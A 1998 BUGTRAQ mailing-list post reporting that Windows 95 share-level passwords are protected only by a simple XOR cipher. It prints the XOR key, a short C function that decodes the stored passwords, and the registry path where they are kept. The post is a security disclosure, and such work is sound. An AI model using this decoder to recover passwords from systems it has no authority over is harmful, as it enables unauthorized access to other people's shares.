Date: Mon, 9 Feb 1998 01:32:25 -0500
From: a42n8k9@redrose.net
To: BUGTRAQ@NETSPACE.ORG
Subject: How one small flaw could lead to major problems

Greetings,

First off I would like to appologize to aleph1.  It would appear that an
original draft of this got sent direct, before I had completed my
thoughts on it.  I will try and be more carefull when wielding a loaded
mouse.  (hope no one got hurt)

And now for the stuff ...

While perusing the rootshell.com site, I came accross the file
"sharepw.c" under January's archive group.  The program demonstrates the
ability to decode the Windows95 "share-level" password.  Curious, I
downloaded the file and began to examine it.  The file itself weighs in
at 883 lines in length, though largely commented.  The code contains
what are termed "pairs", "quads", "blocks", and "tables" that are used
to decipher the password 'inline'.

Upon further examination, (by mere chance actually), I noticed an
alarming similarity developing between the coded and decoded passwords.
Someone please correct me if I am wrong, but it would seem that the
"share-level" password is nothing more than an Simple-XOR cipher.  With
this being the case, the 883 line program gets reduced the the few line
you see below.

u_char key[] = { 0x35, 0x9a, 0x4d, 0xa6, 0x53, 0xa9, 0xd4, 0x6a, };

void CrackSharePW(u_char *PW, u_long Size) {
    PW[Size] = '\0';
    while(Size--)
        PW[Size] ^= key[Size];
}

The passwords can be found in the registry at:
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan